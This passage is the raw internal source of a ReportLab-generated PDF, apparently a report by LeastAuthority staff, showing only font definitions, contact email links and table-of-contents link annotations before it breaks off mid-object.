%PDF-1.4 %???? ReportLab Generated PDF document http://www.reportlab.com % 'BasicFonts': class PDFDictionary 1 0 obj % The standard fonts dictionary << /F1 2 0 R /F2 3 0 R /F3 48 0 R /F4 138 0 R /F5 145 0 R /F6 186 0 R /F7 187 0 R /F8 194 0 R >> endobj % 'F1': class PDFType1Font 2 0 obj % Font Helvetica << /BaseFont /Helvetica /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font >> endobj % 'F2': class PDFType1Font 3 0 obj % Font Helvetica-Bold << /BaseFont /Helvetica-Bold /Encoding /WinAnsiEncoding /Name /F2 /Subtype /Type1 /Type /Font >> endobj % 'Annot.NUMBER1': class PDFDictionary 4 0 obj << /A << /S /URI /Type /Action /URI (mailto:nathan@LeastAuthority.com) >> /Border [ 0 0 0 ] /Rect [ 181.7729 689.7736 308.0929 701.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER2': class PDFDictionary 5 0 obj << /A << /S /URI /Type /Action /URI (mailto:zooko@LeastAuthority.com) >> /Border [ 0 0 0 ] /Rect [ 217.5729 671.7736 339.9929 683.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER3': class PDFDictionary 6 0 obj << /A << /S /URI /Type /Action /URI (mailto:taylor@LeastAuthority.com) >> /Border [ 0 0 0 ] /Rect [ 180.1029 653.7736 300.2929 665.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER4': class PDFDictionary 7 0 obj << /A << /S /URI /Type /Action /URI (mailto:darius@LeastAuthority.com) >> /Border [ 0 0 0 ] /Rect [ 177.3329 635.7736 300.3029 647.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER5': class LinkAnnotation 8 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 137 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 587.7736 107.1629 599.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER6': class LinkAnnotation 9 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 137 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 587.7736 532.5827 599.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER7': class LinkAnnotation 10 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 137 0 R /XYZ 62.69291 690.0236 0 ] 
/Rect [ 82.69291 569.7736 153.8229 581.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER8': class LinkAnnotation 11 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 137 0 R /XYZ 62.69291 690.0236 0 ] /Rect [ 527.0227 569.7736 532.5827 581.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER9': class LinkAnnotation 12 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 137 0 R /XYZ 62.69291 630.0236 0 ] /Rect [ 82.69291 551.7736 136.6129 563.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER10': class LinkAnnotation 13 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 137 0 R /XYZ 62.69291 630.0236 0 ] /Rect [ 527.0227 551.7736 532.5827 563.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER11': class LinkAnnotation 14 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 137 0 R /XYZ 62.69291 570.0236 0 ] /Rect [ 82.69291 533.7736 208.8529 545.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER12': class LinkAnnotation 15 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 137 0 R /XYZ 62.69291 570.0236 0 ] /Rect [ 527.0227 533.7736 532.5827 545.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER13': class LinkAnnotation 16 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 141 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 515.7736 101.6029 527.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER14': class LinkAnnotation 17 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 141 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 515.7736 532.5827 527.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER15': class LinkAnnotation 18 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 141 0 R /XYZ 62.69291 282.0236 0 ] /Rect [ 82.69291 497.7736 243.8829 509.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER16': class LinkAnnotation 19 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 141 0 R /XYZ 62.69291 282.0236 0 ] /Rect [ 527.0227 497.7736 532.5827 509.7736 ] /Subtype /Link /Type /Annot >> endobj % 
'Annot.NUMBER17': class LinkAnnotation 20 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 148 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 479.7736 108.2629 491.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER18': class LinkAnnotation 21 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 148 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 479.7736 532.5827 491.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER19': class LinkAnnotation 22 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 148 0 R /XYZ 62.69291 624.0236 0 ] /Rect [ 82.69291 461.7736 138.2729 473.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER20': class LinkAnnotation 23 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 148 0 R /XYZ 62.69291 624.0236 0 ] /Rect [ 527.0227 461.7736 532.5827 473.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER21': class LinkAnnotation 24 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 148 0 R /XYZ 62.69291 594.0236 0 ] /Rect [ 102.6929 443.7736 141.0329 455.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER22': class LinkAnnotation 25 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 148 0 R /XYZ 62.69291 594.0236 0 ] /Rect [ 527.0227 443.7736 532.5827 455.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER23': class LinkAnnotation 26 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 148 0 R /XYZ 62.69291 537.0236 0 ] /Rect [ 102.6929 425.7736 166.6129 437.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER24': class LinkAnnotation 27 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 148 0 R /XYZ 62.69291 537.0236 0 ] /Rect [ 527.0227 425.7736 532.5827 437.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER25': class LinkAnnotation 28 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 148 0 R /XYZ 62.69291 121.0236 0 ] /Rect [ 82.69291 407.7736 173.8429 419.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER26': class LinkAnnotation 29 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 148 0 R 
/XYZ 62.69291 121.0236 0 ] /Rect [ 527.0227 407.7736 532.5827 419.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER27': class LinkAnnotation 30 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 150 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 389.7736 104.3629 401.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER28': class LinkAnnotation 31 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 150 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 389.7736 532.5827 401.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER29': class LinkAnnotation 32 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 150 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 82.69291 371.7736 144.9329 383.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER30': class LinkAnnotation 33 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 150 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 527.0227 371.7736 532.5827 383.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER31': class LinkAnnotation 34 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 150 0 R /XYZ 62.69291 642.0236 0 ] /Rect [ 102.6929 353.7736 161.0429 365.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER32': class LinkAnnotation 35 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 150 0 R /XYZ 62.69291 642.0236 0 ] /Rect [ 527.0227 353.7736 532.5827 365.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER33': class LinkAnnotation 36 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 153 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 335.7736 340.0029 347.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER34': class LinkAnnotation 37 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 153 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 335.7736 532.5827 347.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER35': class LinkAnnotation 38 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 158 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 317.7736 417.2829 329.7736 ] /Subtype /Link /Type /Annot 
>> endobj % 'Annot.NUMBER36': class LinkAnnotation 39 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 158 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 317.7736 532.5827 329.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER37': class LinkAnnotation 40 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 170 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 299.7736 305.0029 311.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER38': class LinkAnnotation 41 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 170 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 299.7736 532.5827 311.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER39': class LinkAnnotation 42 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 176 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 281.7736 448.3629 293.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER40': class LinkAnnotation 43 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 176 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 281.7736 532.5827 293.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER41': class LinkAnnotation 44 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 181 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 263.7736 422.2729 275.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER42': class LinkAnnotation 45 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 181 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 263.7736 532.5827 275.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER43': class LinkAnnotation 46 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 188 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 245.7736 376.1429 257.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER44': class LinkAnnotation 47 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 188 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 245.7736 532.5827 257.7736 ] /Subtype /Link /Type /Annot >> endobj % 'F3': class PDFType1Font 48 0 obj % Font Courier << /BaseFont /Courier /Encoding 
/WinAnsiEncoding /Name /F3 /Subtype /Type1 /Type /Font >> endobj % 'Annot.NUMBER45': class LinkAnnotation 49 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 195 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 227.7736 285.0029 239.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER46': class LinkAnnotation 50 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 195 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 285.0029 227.7736 405.0029 239.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER47': class LinkAnnotation 51 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 195 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 405.0029 227.7736 437.7929 239.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER48': class LinkAnnotation 52 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 195 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 227.7736 532.5827 239.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER49': class LinkAnnotation 53 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 200 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 209.7736 434.4729 221.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER50': class LinkAnnotation 54 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 200 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 197.7736 166.6029 209.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER51': class LinkAnnotation 55 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 200 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 209.7736 532.5827 221.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER52': class LinkAnnotation 56 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 209 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 179.7736 253.8729 191.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER53': class LinkAnnotation 57 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 209 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 179.7736 532.5827 191.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER54': class 
LinkAnnotation 58 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 161.7736 460.0629 173.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER55': class LinkAnnotation 59 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 161.7736 532.5827 173.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER56': class LinkAnnotation 60 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 220 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 143.7736 310.5529 155.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER57': class LinkAnnotation 61 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 220 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 143.7736 532.5827 155.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER58': class LinkAnnotation 62 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 224 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 125.7736 338.3429 137.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER59': class LinkAnnotation 63 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 224 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 125.7736 532.5827 137.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER60': class LinkAnnotation 64 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 227 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 107.7736 273.8729 119.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER61': class LinkAnnotation 65 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 227 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 107.7736 532.5827 119.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER62': class LinkAnnotation 66 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 229 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 89.77362 264.9829 101.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER63': class LinkAnnotation 67 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 229 0 R /XYZ 62.69291 765.0236 0 ] 
/Rect [ 521.4627 89.77362 532.5827 101.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page1': class PDFPage 68 0 obj % Page dictionary << /Annots [ 4 0 R 5 0 R 6 0 R 7 0 R 8 0 R 9 0 R 10 0 R 11 0 R 12 0 R 13 0 R 14 0 R 15 0 R 16 0 R 17 0 R 18 0 R 19 0 R 20 0 R 21 0 R 22 0 R 23 0 R 24 0 R 25 0 R 26 0 R 27 0 R 28 0 R 29 0 R 30 0 R 31 0 R 32 0 R 33 0 R 34 0 R 35 0 R 36 0 R 37 0 R 38 0 R 39 0 R 40 0 R 41 0 R 42 0 R 43 0 R 44 0 R 45 0 R 46 0 R 47 0 R 49 0 R 50 0 R 51 0 R 52 0 R 53 0 R 54 0 R 55 0 R 56 0 R 57 0 R 58 0 R 59 0 R 60 0 R 61 0 R 62 0 R 63 0 R 64 0 R 65 0 R 66 0 R 67 0 R ] /Contents 343 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER64': class LinkAnnotation 69 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 234 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 750.7736 267.7529 762.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER65': class LinkAnnotation 70 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 234 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 750.7736 532.5827 762.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER66': class LinkAnnotation 71 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 238 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 732.7736 287.2129 744.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER67': class LinkAnnotation 72 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 238 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 732.7736 532.5827 744.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER68': class LinkAnnotation 73 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 239 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 714.7736 313.3229 726.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER69': class LinkAnnotation 74 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 239 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 714.7736 532.5827 
726.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER70': class LinkAnnotation 75 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 245 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 696.7736 244.4229 708.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER71': class LinkAnnotation 76 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 245 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 696.7736 532.5827 708.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER72': class LinkAnnotation 77 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 245 0 R /XYZ 62.69291 693.0236 0 ] /Rect [ 102.6929 678.7736 175.4929 690.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER73': class LinkAnnotation 78 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 245 0 R /XYZ 62.69291 693.0236 0 ] /Rect [ 521.4627 678.7736 532.5827 690.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER74': class LinkAnnotation 79 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 245 0 R /XYZ 62.69291 462.0236 0 ] /Rect [ 102.6929 660.7736 186.0529 672.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER75': class LinkAnnotation 80 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 245 0 R /XYZ 62.69291 462.0236 0 ] /Rect [ 521.4627 660.7736 532.5827 672.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER76': class LinkAnnotation 81 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 245 0 R /XYZ 62.69291 363.0236 0 ] /Rect [ 122.6929 642.7736 198.2729 654.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER77': class LinkAnnotation 82 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 245 0 R /XYZ 62.69291 363.0236 0 ] /Rect [ 521.4627 642.7736 532.5827 654.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER78': class LinkAnnotation 83 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 624.7736 121.5829 636.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER79': class LinkAnnotation 84 0 obj 
<< /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 624.7736 532.5827 636.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER80': class LinkAnnotation 85 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 82.69291 606.7736 192.1829 618.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER81': class LinkAnnotation 86 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 521.4627 606.7736 532.5827 618.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER82': class LinkAnnotation 87 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 648.0236 0 ] /Rect [ 82.69291 588.7736 178.8429 600.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER83': class LinkAnnotation 88 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 648.0236 0 ] /Rect [ 521.4627 588.7736 532.5827 600.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER84': class LinkAnnotation 89 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 564.0236 0 ] /Rect [ 82.69291 570.7736 171.0529 582.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER85': class LinkAnnotation 90 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 564.0236 0 ] /Rect [ 521.4627 570.7736 532.5827 582.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER86': class LinkAnnotation 91 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 492.0236 0 ] /Rect [ 82.69291 552.7736 209.9729 564.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER87': class LinkAnnotation 92 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 492.0236 0 ] /Rect [ 521.4627 552.7736 532.5827 564.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER88': class LinkAnnotation 93 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 260 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 
534.7736 169.9229 546.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER89': class LinkAnnotation 94 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 260 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 534.7736 532.5827 546.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER90': class LinkAnnotation 95 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 260 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 82.69291 516.7736 162.1629 528.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER91': class LinkAnnotation 96 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 260 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 521.4627 516.7736 532.5827 528.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER92': class LinkAnnotation 97 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 260 0 R /XYZ 62.69291 660.0236 0 ] /Rect [ 82.69291 498.7736 198.8729 510.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER93': class LinkAnnotation 98 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 260 0 R /XYZ 62.69291 660.0236 0 ] /Rect [ 521.4627 498.7736 532.5827 510.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER94': class LinkAnnotation 99 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 260 0 R /XYZ 62.69291 522.0236 0 ] /Rect [ 82.69291 480.7736 133.8329 492.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER95': class LinkAnnotation 100 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 260 0 R /XYZ 62.69291 522.0236 0 ] /Rect [ 521.4627 480.7736 532.5827 492.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER96': class LinkAnnotation 101 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 260 0 R /XYZ 62.69291 360.0236 0 ] /Rect [ 82.69291 462.7736 133.8329 474.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER97': class LinkAnnotation 102 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 260 0 R /XYZ 62.69291 360.0236 0 ] /Rect [ 521.4627 462.7736 532.5827 474.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER98': class 
LinkAnnotation 103 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 261 0 R /XYZ 62.69291 299.5441 0 ] /Rect [ 82.69291 444.7736 133.8329 456.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER99': class LinkAnnotation 104 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 261 0 R /XYZ 62.69291 299.5441 0 ] /Rect [ 521.4627 444.7736 532.5827 456.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER100': class LinkAnnotation 105 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 265 0 R /XYZ 62.69291 453.0236 0 ] /Rect [ 82.69291 426.7736 133.8329 438.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER101': class LinkAnnotation 106 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 265 0 R /XYZ 62.69291 453.0236 0 ] /Rect [ 521.4627 426.7736 532.5827 438.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER102': class LinkAnnotation 107 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 265 0 R /XYZ 62.69291 399.0236 0 ] /Rect [ 82.69291 408.7736 133.8329 420.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER103': class LinkAnnotation 108 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 265 0 R /XYZ 62.69291 399.0236 0 ] /Rect [ 521.4627 408.7736 532.5827 420.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER104': class LinkAnnotation 109 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 265 0 R /XYZ 62.69291 243.0236 0 ] /Rect [ 82.69291 390.7736 133.8329 402.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER105': class LinkAnnotation 110 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 265 0 R /XYZ 62.69291 243.0236 0 ] /Rect [ 521.4627 390.7736 532.5827 402.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER106': class LinkAnnotation 111 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 265 0 R /XYZ 62.69291 189.0236 0 ] /Rect [ 82.69291 372.7736 133.8329 384.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER107': class LinkAnnotation 112 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 265 0 R /XYZ 
